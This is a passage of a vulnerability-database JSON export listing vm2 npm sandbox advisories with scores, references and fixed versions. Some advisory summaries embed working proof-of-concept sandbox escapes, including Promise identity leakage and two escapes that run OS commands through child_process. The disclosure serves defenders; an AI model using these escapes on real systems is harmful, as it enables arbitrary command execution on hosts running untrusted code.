ID-jv3n-721k-z3h7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-tux1-cjy7-53bf"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"},{"vulnerability":"VCID-zz97-v3rg-1bck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.6.11"}],"aliases":["CVE-2019-10761","GHSA-wf5x-cr3r-xr77"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pfwa-v62j-cyds"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61340?format=json","vulnerability_id":"VCID-pytn-u4me-9bee","summary":"vm2: Node.js: vm2: Arbitrary code execution via sandbox escape","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26956.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26956.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26956","reference_id":"","reference_type":"","scores":[{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31854","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31932","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31901","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31862","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.3183","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26956"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.5","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-05T13:09:59Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.5"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-ffh4-j6h5-pg66","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-05T13:09:59Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-ffh4-j6h5-pg66"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26956","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26956"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466548","reference_id":"2466548","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466548"},{"reference_url":"https://github.com/advisories/GHSA-ffh4-j6h5-pg66","reference_id":"GHSA-ffh4-j6h5-pg66","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ffh4-j6h5-pg66"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114464?format=json","purl":"pkg:npm/vm2@3.10.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-73yk-bmf3-d3e3"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d3fg-nauj-p3gk"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.10.5"}],"aliases":["CVE-2026-26956","GHSA-ffh4-j6h5-pg66"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pytn-u4me-9bee"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92253?format=json","vulnerability_id":"VCID-rd8s-311d-8qcq","summary":"vm2 Host Promise Resolution Preserves Object Identity Across Sandbox Boundary\n### Summary\n\nA sandbox boundary violation in **vm2** allows host object identity to cross into the sandbox through host Promise resolution.\n\nWhen a host-side Promise that resolves to a host object is exposed to the sandbox, the value delivered to the sandbox `.then()` callback preserves host identity. This allows the sandbox to interact with the host object directly, including:\n\n- Performing identity checks using host-side `WeakMap`\n- Mutating host object state from inside the sandbox\n\nThis behavior occurs because the Promise fulfillment wrapper uses `ensureThis()` instead of the stronger cross-realm conversion path (`from()` / proxy wrapping). If no prototype mapping is found, `ensureThis()` returns the original object.\n\nAs a result, objects resolved by host Promises can cross the sandbox boundary without proper isolation.\n\n---\n\n### Details\n\nIn `setup-sandbox.js`, vm2 wraps `Promise.prototype.then`:\n\n```js\nglobalPromise.prototype.then = function then(onFulfilled, onRejected) {\n resetPromiseSpecies(this);\n\n if (typeof onFulfilled === 'function') {\n const origOnFulfilled = onFulfilled;\n onFulfilled = function onFulfilled(value) {\n value = ensureThis(value);\n return apply(origOnFulfilled, this, [value]);\n };\n }\n\n return apply(globalPromiseThen, this, [onFulfilled, onRejected]);\n};\n\n\nThe wrapper calls ensureThis(value) before invoking the sandbox callback.\n\nHowever, ensureThis is implemented in bridge.js as thisEnsureThis():\n\nfunction thisEnsureThis(other) {\n const type = typeof other;\n\n switch (type) {\n case 'object':\n if (other === null) return null;\n\n case 'function':\n let proto = thisReflectGetPrototypeOf(other);\n\n if (!proto) {\n return other;\n }\n\n while (proto) {\n const mapping = thisReflectApply(thisMapGet, protoMappings, [proto]);\n\n if (mapping) {\n const mapped = thisReflectApply(thisWeakMapGet, mappingOtherToThis, [other]);\n if (mapped) return mapped;\n return mapping(defaultFactory, other);\n }\n\n proto = thisReflectGetPrototypeOf(proto);\n }\n\n return other;\n\nIf no prototype mapping is found, ensureThis() simply returns the original object:\n\nreturn other;\n\nThis means the sandbox receives the original host object instead of a proxied or sanitized representation.\n\nBecause of this behavior, values resolved by host Promises can cross the host–sandbox boundary with identity preserved.\n\nPoC\n\nThe following Proof of Concept demonstrates that an object resolved by a host Promise can be used as a valid key in a host-side WeakMap from inside the sandbox.\n\nWeakMap keys rely on reference identity, so a successful lookup proves that the sandbox received the host object identity.\n\nPoC Code\nimport {VM} from \"./index.js\";\n\nconst hostObj = {tag: \"HOST_OBJ\"};\nconst hostPromise = Promise.resolve(hostObj);\n\n// WeakMap created on the host\nconst wm = new WeakMap([[hostObj, \"HIT\"]]);\n\nconst vm = new VM({\n sandbox: {hostPromise, wm},\n timeout: 1000,\n eval: false,\n wasm: false,\n});\n\nconst code = `\n hostPromise.then(v => ({\n weakMapGet: wm.get(v),\n typeofV: typeof v,\n tag: v.tag\n }))\n`;\n\nconst result = await vm.run(code);\n\nconsole.log(\"VM RESULT:\", result);\nconsole.log(\"HOST SAME KEY STILL:\", wm.get(hostObj));\nOutput\nVM RESULT: { weakMapGet: 'HIT', typeofV: 'object', tag: 'HOST_OBJ' }\nHOST SAME KEY STILL: HIT\n\nThis confirms that the object delivered to the sandbox callback retains host identity.\n\nAdditional Demonstration: Host Object Mutation\n\nThe sandbox can also mutate host object state through the resolved Promise value.\n\nimport {VM} from \"./index.js\";\n\nconst hostObj = {tag: \"HOST_OBJ\", nested: {x: 1}};\nconst hostPromise = Promise.resolve(hostObj);\n\nconst vm = new VM({\n sandbox: {hostPromise},\n timeout: 1000,\n eval: false,\n wasm: false,\n});\n\nconst code = `\n hostPromise.then(v => {\n v.nested.x = 999;\n v.tag = \"MUTATED\";\n return { seenTag: v.tag, seenX: v.nested.x };\n })\n`;\n\nconst result = await vm.run(code);\n\nconsole.log(\"VM RESULT:\", result);\nconsole.log(\"HOST AFTER:\", hostObj);\n\n**Output:**\nVM RESULT: { seenTag: 'MUTATED', seenX: 999 }\nHOST AFTER: { tag: 'MUTATED', nested: { x: 999 } }\n\nThis demonstrates write-through mutation of a host object from sandbox code.\n\n**Impact**\nThis vulnerability allows host object references to cross the vm2 sandbox boundary via Promise resolution.\n\nConsequences include:\n\nHost object identity disclosure\n\nWrite-through mutation of host objects\n\nWeakMap / WeakSet identity oracle across the boundary\n\nPotential capability leaks if sensitive host objects are reachable via Promises\n\nApplications that expose host Promises to sandboxed code may unintentionally grant the sandbox direct access to host objects.\n\nThis weakens the intended isolation guarantees of vm2.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44000","reference_id":"","reference_type":"","scores":[{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.14856","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.14795","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.14773","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.149","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.14897","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44000"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-mpf8-4hx2-7cjg","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-13T18:20:50Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-mpf8-4hx2-7cjg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44000","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44000"},{"reference_url":"https://github.com/advisories/GHSA-mpf8-4hx2-7cjg","reference_id":"GHSA-mpf8-4hx2-7cjg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mpf8-4hx2-7cjg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-44000","GHSA-mpf8-4hx2-7cjg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rd8s-311d-8qcq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/94030?format=json","vulnerability_id":"VCID-t48f-zxgy-m7az","summary":"vm2 NodeVM `nesting: true` bypasses `require: false` allowing sandbox escape and arbitrary OS command execution\n### Summary\n\nWhen a `NodeVM` is created with `nesting: true`, sandbox code can unconditionally `require('vm2')` regardless of the outer VM's `require` configuration — including `require: false`. With access to `vm2`, the sandbox constructs a new inner `NodeVM` with its own unrestricted `require` settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a `NodeVM` with `nesting: true` is fully compromised.\n\n### Details\n\nThe vulnerability is in how the `nesting: true` option interacts with the legacy module resolver.\n\n**`lib/nodevm.js:96-99`** — `NESTING_OVERRIDE` is a special builtin map that injects the `vm2` package into the sandbox:\n\n```js\nconst NESTING_OVERRIDE = Object.freeze({\n __proto__: null,\n vm2: vm2NestingLoader\n});\n```\n\n**`lib/nodevm.js:268-269`** — When `nesting: true`, this override is passed into the resolver factory alongside the host's `require` options:\n\n```js\nconst customResolver = requireOpts instanceof Resolver;\nconst resolver = customResolver ? requireOpts : makeResolverFromLegacyOptions(\n requireOpts,\n nesting && NESTING_OVERRIDE, // ← injected when nesting:true\n this._compiler\n);\n```\n\n**`lib/resolver-compat.js:193-197`** — This is the vulnerable branch. When `require: false` is set, `requireOpts` is falsy, so `!options` is true. Without nesting the function returns `DENY_RESOLVER` (block everything). With nesting, it instead builds a resolver that includes `vm2` from `NESTING_OVERRIDE`:\n\n```js\nfunction makeResolverFromLegacyOptions(options, override, compiler) {\n if (!options) {\n if (!override) return DENY_RESOLVER; // require:false, no nesting → deny all\n // BUG: require:false + nesting:true reaches here\n // override (NESTING_OVERRIDE) is applied, making vm2 available\n const builtins = makeBuiltinsFromLegacyOptions(undefined, defaultRequire, undefined, override);\n return new Resolver(DEFAULT_FS, [], builtins); // vm2 is now requireable\n }\n // ...\n}\n```\n\n**`lib/builtin.js:102-106`** — `NESTING_OVERRIDE` is merged unconditionally into builtins, overriding any user-configured allowlist:\n\n```js\nif (overrides) {\n const keys = Object.getOwnPropertyNames(overrides);\n for (const key of keys) {\n res.set(key, overrides[key]); // vm2 always injected when nesting:true\n }\n}\n```\n\nThe result: `require('vm2')` always succeeds inside a `NodeVM` with `nesting: true`, regardless of `require: false`, `require: { builtin: [] }`, or any other restriction. Once the sandbox has `vm2`, it creates a new inner `NodeVM` with whatever `require` config it chooses — unconstrained by the outer VM — and reaches `child_process`.\n\nThis was introduced in commit `2353ce60` (Feb 8, 2022) and survived a major refactor in commit `9e2b6051` (Apr 8, 2023). The JSDoc for `nesting` does warn that \"scripts can create a NodeVM which can require any host module,\" but does not document that `nesting: true` silently defeats `require: false`, which is the non-obvious part of this interaction.\n\n### PoC\n\n**Requirements:** vm2 installed, Node.js v22.22.1 (also reproduced on earlier versions).\n\n```js\nconst { NodeVM } = require('vm2');\n\n// Host intends: nesting enabled, but require completely disabled\nconst vm = new NodeVM({ nesting: true, require: false });\n\nconst result = vm.run(`\n // Step 1: require('vm2') succeeds despite require:false on the outer VM\n const { NodeVM: NVM } = require('vm2');\n\n // Step 2: create an inner NodeVM with attacker-chosen require config\n // This inner VM has no relation to the outer VM's restrictions\n const inner = new NVM({ require: { builtin: ['child_process'] } });\n\n // Step 3: execute arbitrary OS command in the inner VM\n module.exports = inner.run(\n 'module.exports = require(\"child_process\").execSync(\"id\").toString()'\n );\n`);\n\nconsole.log(result);\n// uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),...\n```\n\n**Observed output (confirmed on Node v22.22.1, vm2 commit `8dd0591`):**\n```\nuid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),104(kvm),118(lpadmin),989(docker),990(ollama),991(nordvpn)\n```\n\nThe variant with `require: false` also works — the outer VM's require setting has no effect:\n\n```js\nnew NodeVM({ nesting: true, require: false }).run(`\n const { NodeVM: NVM } = require('vm2');\n module.exports = new NVM({ require: { builtin: ['child_process'] } })\n .run('module.exports = require(\"child_process\").execSync(\"id\").toString()');\n`);\n// uid=1000(akshat) ...\n```\n\nNarrow builtin allowlists are also bypassed. `require: { builtin: ['path'] }` still allows `require('vm2')` when nesting is enabled.\n\n### Impact\n\n**Who is affected:** Any application that runs untrusted or user-supplied code inside a `NodeVM` with `nesting: true`. This includes multi-tenant code execution platforms, notebook/REPL services, plugin systems, and CI sandboxing tools that use vm2.\n\n**What an attacker can do:** Execute arbitrary OS commands as the host process user. From there: read/write files, exfiltrate secrets from the environment, move laterally on the host network, or establish persistence.\n\n**Severity:** The mental model mismatch is the core danger. A developer who sets `require: false` to lock down modules, then adds `nesting: true` to allow child VM creation, will believe the sandbox is restricted. It is not — `require: false` is silently overridden and the sandbox has unrestricted OS access.\n\n**Note:** `nesting: true` must be set by the host. This is not a zero-cooperation escape from a default `NodeVM`. However, it is not pure misconfiguration either: the implementation defeats a strong and reasonable expectation (`require: false` should mean deny all), and the existing warning in the docs does not surface the `require: false` bypass specifically.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44007","reference_id":"","reference_type":"","scores":[{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.15048","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.1499","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.14965","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.15097","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00047","scoring_system":"epss","scoring_elements":"0.15088","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44007"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.1","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.1"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-15T03:55:57Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44007","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44007"},{"reference_url":"http://www.openwall.com/lists/oss-security/2026/05/05/11","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2026/05/05/11"},{"reference_url":"https://github.com/advisories/GHSA-8hg8-63c5-gwmx","reference_id":"GHSA-8hg8-63c5-gwmx","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8hg8-63c5-gwmx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/117312?format=json","purl":"pkg:npm/vm2@3.11.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.1"}],"aliases":["CVE-2026-44007","GHSA-8hg8-63c5-gwmx"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t48f-zxgy-m7az"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/94884?format=json","vulnerability_id":"VCID-t5ax-32h1-13ha","summary":"vm2 has Sandbox Breakout Through Null Proto Exception\n### Summary\n\nVM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.\n\n### Details\n\nIn `handleException` due to ``// SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`)`` exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host `Function` object.\n\n### PoC\n\n```js\nconst {VM} = require(\"vm2\");\nconst vm = new VM();\nconsole.log(vm.run(`\nconst o = {__proto__: null};\ntry {\n\tthrow o;\n} catch (e) {\n\te.f = Buffer.prototype.inspect\n\to.f.constructor(\"return process\")().mainModule.require('child_process').execSync('touch pwned');\n}\n`));\n```\n\n### Impact\n\nAttackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44009","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.0572","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05699","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05664","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05707","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05706","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44009"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.2"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-9vg3-4rfj-wgcm","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-13T18:41:46Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-9vg3-4rfj-wgcm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44009","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44009"},{"reference_url":"https://github.com/advisories/GHSA-9vg3-4rfj-wgcm","reference_id":"GHSA-9vg3-4rfj-wgcm","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9vg3-4rfj-wgcm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114480?format=json","purl":"pkg:npm/vm2@3.11.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ue7f-8en8-cufa"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.2"}],"aliases":["CVE-2026-44009","GHSA-9vg3-4rfj-wgcm"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t5ax-32h1-13ha"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/41600?format=json","vulnerability_id":"VCID-tux1-cjy7-53bf","summary":"Improperly Controlled Modification of Dynamically-Determined Object Attributes\nThis affects the package vm2 via a Prototype Pollution attack vector, which can lead to execution of arbitrary code on the host machine.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-23449","reference_id":"","reference_type":"","scores":[{"value":"0.02202","scoring_system":"epss","scoring_elements":"0.84756","published_at":"2026-06-07T12:55:00Z"},{"value":"0.02202","scoring_system":"epss","scoring_elements":"0.84759","published_at":"2026-06-09T12:55:00Z"},{"value":"0.02202","scoring_system":"epss","scoring_elements":"0.84745","published_at":"2026-06-08T12:55:00Z"},{"value":"0.02202","scoring_system":"epss","scoring_elements":"0.84734","published_at":"2026-06-04T12:55:00Z"},{"value":"0.02202","scoring_system":"epss","scoring_elements":"0.84758","published_at":"2026-06-05T12:55:00Z"},{"value":"0.02202","scoring_system":"epss","scoring_elements":"0.84762","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-23449"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/b4f6e2bd2c4a1ef52fc4483d8e35f28bc4481886","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/b4f6e2bd2c4a1ef52fc4483d8e35f28bc4481886"},{"reference_url":"https://github.com/patriksimek/vm2/issues/363","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVS